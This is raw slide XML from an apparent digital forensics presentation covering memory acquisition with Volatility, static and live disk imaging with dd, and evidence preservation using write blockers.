                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>loads</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-8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404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>into</a:t>
            </a:r>
            <a:endParaRPr sz="2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dirty="0" sz="2200" spc="40">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>software</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-8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404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>tool</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-10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404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>for</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-9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404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>analysis.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44388" y="306451"/>
            <a:ext cx="496824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45">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>System</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-145">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="204">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Memory</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-135">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="100">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Acquisition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11623" y="760476"/>
            <a:ext cx="7021068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975104" y="2345410"/>
            <a:ext cx="12317095" cy="6218555"/>
            <a:chOff x="1975104" y="2345410"/>
            <a:chExt cx="12317095" cy="621855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4916" y="2583179"/>
              <a:ext cx="12275820" cy="598017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046732" y="2633471"/>
              <a:ext cx="12151360" cy="5857240"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="12151360" h="5857240">
                  <a:moveTo>
                    <a:pt x="12150852" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="5856732"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12150852" y="5856732"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12150852" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="2838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046732" y="2633471"/>
              <a:ext cx="12151360" cy="5857240"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="12151360" h="5857240">
                  <a:moveTo>
                    <a:pt x="0" y="5856732"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="12150852" y="5856732"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12150852" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="5856732"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="952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5104" y="2345410"/>
              <a:ext cx="12316968" cy="46789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020824" y="2391155"/>
              <a:ext cx="12202795" cy="353695"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="12202794" h="353694">
                  <a:moveTo>
                    <a:pt x="12105640" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="97027" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="59257" y="7623"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28416" y="28416"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7623" y="59257"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="97027"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="353568"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12202668" y="353568"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12202668" y="97027"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12195044" y="59257"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12174251" y="28416"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12143410" y="7623"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12105640" y="0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5104" y="8305799"/>
              <a:ext cx="12316968" cy="25295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020824" y="8351519"/>
              <a:ext cx="12202795" cy="139065"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="12202794" h="139065">
                  <a:moveTo>
                    <a:pt x="12202668" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="138683"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12202668" y="138683"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12202668" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="5396D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46020" y="2857499"/>
              <a:ext cx="11352276" cy="538124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546475" y="1463801"/>
            <a:ext cx="9715500" cy="69723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3529965" marR="5080" indent="-3517900">
              <a:lnSpc>
                <a:spcPct val="100499"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="80"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="4405630" algn="l"/>
              </a:tabLst>
            </a:pP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screenshot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below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Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>shows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	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process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Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>list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memory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45">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>dump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rebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>using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dirty="0" sz="2200" spc="-6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Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>volatility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framework.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5491" y="306451"/>
            <a:ext cx="406400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60">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Disk</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-150">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="175">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Image</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-140">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="100">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Acquisition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91328" y="760476"/>
            <a:ext cx="5687568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91536" y="1756298"/>
            <a:ext cx="11432540" cy="1049655"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="1885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485"/>
              </a:spcBef>
            </a:pP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helps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non-volatile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storage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media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3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>devices.</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-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three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device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states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persistent</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Trebuchet MS"/>
              <a:cs typeface="Trebuchet MS"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" marL="1270">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1395"/>
              </a:spcBef>
            </a:pP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storage</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-114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acquisition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Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>include: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89419" y="3681984"/>
            <a:ext cx="3416807" cy="438912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797934" y="6401841"/>
            <a:ext cx="2611755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7180" marR="5080" indent="-285115">
              <a:lnSpc>
                <a:spcPct val="114100"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-20">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Static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acquisition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by </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-6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pulling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plug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32718" y="4922672"/>
            <a:ext cx="3039745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14629">
              <a:lnSpc>
                <a:spcPct val="114100"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-20">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Static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acquisition </a:t>
            </a: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by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shutting</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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20">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>down</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-10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host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32782" y="4293235"/>
            <a:ext cx="202120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solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Live</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-13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acquisition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5491" y="306451"/>
            <a:ext cx="406400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60">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Disk</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-150">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="175">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Image</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-140">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="100">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Acquisition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91328" y="760476"/>
            <a:ext cx="5687568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60372" y="1756298"/>
            <a:ext cx="13289915" cy="1435100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="188595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1485"/>
              </a:spcBef>
            </a:pP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Imaging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Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>utilities</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-4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include</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-4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forensic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software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suites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formats.</a:t>
            </a:r>
            <a:endParaRPr sz="2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395"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="120">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>dd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20">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>command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10">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>used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Linux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make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copy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input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file(if=)</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-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output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Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>file(of=)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conversions</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Trebuchet MS"/>
              <a:cs typeface="Trebuchet MS"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" marL="3810">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="395"/>
              </a:spcBef>
            </a:pP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dirty="0" sz="22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applied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file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Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>data.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753611" y="3531095"/>
            <a:ext cx="8784590" cy="3979545"/>
            <a:chOff x="3753611" y="3531095"/>
            <a:chExt cx="8784590" cy="397954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65803" y="3674364"/>
              <a:ext cx="8756904" cy="369265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817619" y="3724656"/>
              <a:ext cx="8632190" cy="3569335"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="8632190" h="3569334">
                  <a:moveTo>
                    <a:pt x="8631936" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="3569208"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8631936" y="3569208"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8631936" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="3645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817619" y="3724656"/>
              <a:ext cx="8632190" cy="3569335"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="8632190" h="3569334">
                  <a:moveTo>
                    <a:pt x="0" y="3569208"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="8631936" y="3569208"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8631936" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="3569208"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="9524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53611" y="3531095"/>
              <a:ext cx="8784336" cy="49683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799331" y="3576828"/>
              <a:ext cx="8670290" cy="382905"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="8670290" h="382904">
                  <a:moveTo>
                    <a:pt x="8565007" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="105028" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64133" y="8249"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30749" y="30749"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8249" y="64133"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="105029"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="382524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8670036" y="382524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8670036" y="105029"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8661786" y="64133"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8639286" y="30749"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8605902" y="8249"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8565007" y="0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1899" y="7248169"/>
              <a:ext cx="8746236" cy="26210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817619" y="7293864"/>
              <a:ext cx="8632190" cy="147955"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="8632190" h="147954">
                  <a:moveTo>
                    <a:pt x="8631936" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="147828"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8631936" y="147828"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8631936" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="5396D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63211" y="4186428"/>
              <a:ext cx="7531608" cy="276453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757042" y="7913319"/>
            <a:ext cx="1148397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9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version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20">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>dd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additional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forensics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Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>functionality</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-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created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by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15">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>DoD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30">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>shown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Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>here.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22367" y="306451"/>
            <a:ext cx="681164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5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Preservation</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-135">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="175">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>and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100">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Integrity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90">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>of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60">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Evidence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36620" y="760476"/>
            <a:ext cx="9395460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653409" y="1933193"/>
            <a:ext cx="890651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Preservation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Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Integrity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evidence</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-4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include</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-3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following</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-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process: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93392" y="3305555"/>
            <a:ext cx="6093460" cy="2051685"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6093459" h="2051685">
                <a:moveTo>
                  <a:pt x="0" y="341884"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3120" y="295485"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12210" y="250986"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26862" y="208793"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46670" y="169314"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71226" y="132955"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="100123" y="100123"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="132955" y="71226"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="169314" y="46670"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="208793" y="26862"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="250986" y="12210"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="295485" y="3120"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="341883" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5751067" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5797466" y="3120"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5841965" y="12210"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5884158" y="26862"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5923637" y="46670"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5959996" y="71226"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5992828" y="100123"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6021725" y="132955"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6046281" y="169314"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6066089" y="208793"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6080741" y="250986"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6089831" y="295485"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6092952" y="341884"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6092952" y="1709420"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6089831" y="1755818"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6080741" y="1800317"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6066089" y="1842510"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6046281" y="1881989"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6021725" y="1918348"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5992828" y="1951180"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5959996" y="1980077"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5923637" y="2004633"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5884158" y="2024441"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5841965" y="2039093"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5797466" y="2048183"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5751067" y="2051304"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="341883" y="2051304"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="295485" y="2048183"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="250986" y="2039093"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="208793" y="2024441"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="169314" y="2004633"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="132955" y="1980077"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="100123" y="1951180"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71226" y="1918348"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46670" y="1881989"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26862" y="1842510"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12210" y="1800317"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3120" y="1755818"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1709420"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="341884"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="EE63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171826" y="3935155"/>
            <a:ext cx="5258435" cy="721360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="55879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2000" spc="-45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dirty="0" sz="20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000" spc="60">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>records</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-12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000" spc="80">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>process</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-11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0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0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000" spc="30">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>evidence</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="20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000" spc="35">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>acquisition</a:t>
            </a:r>
            <a:endParaRPr sz="200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  <a:spcBef>
                <a:spcPts val="335"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="85">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>using</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-10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000" spc="6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dirty="0" sz="20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3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>write</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-114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3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>blocker.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34639" y="2880360"/>
            <a:ext cx="4410710" cy="906780"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4410709" h="906779">
                <a:moveTo>
                  <a:pt x="4259326" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="151130" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="103371" y="7707"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="61886" y="29167"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="29167" y="61886"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7707" y="103371"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="151129"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="755650"/>
                </a:lnTo>
                <a:lnTo>
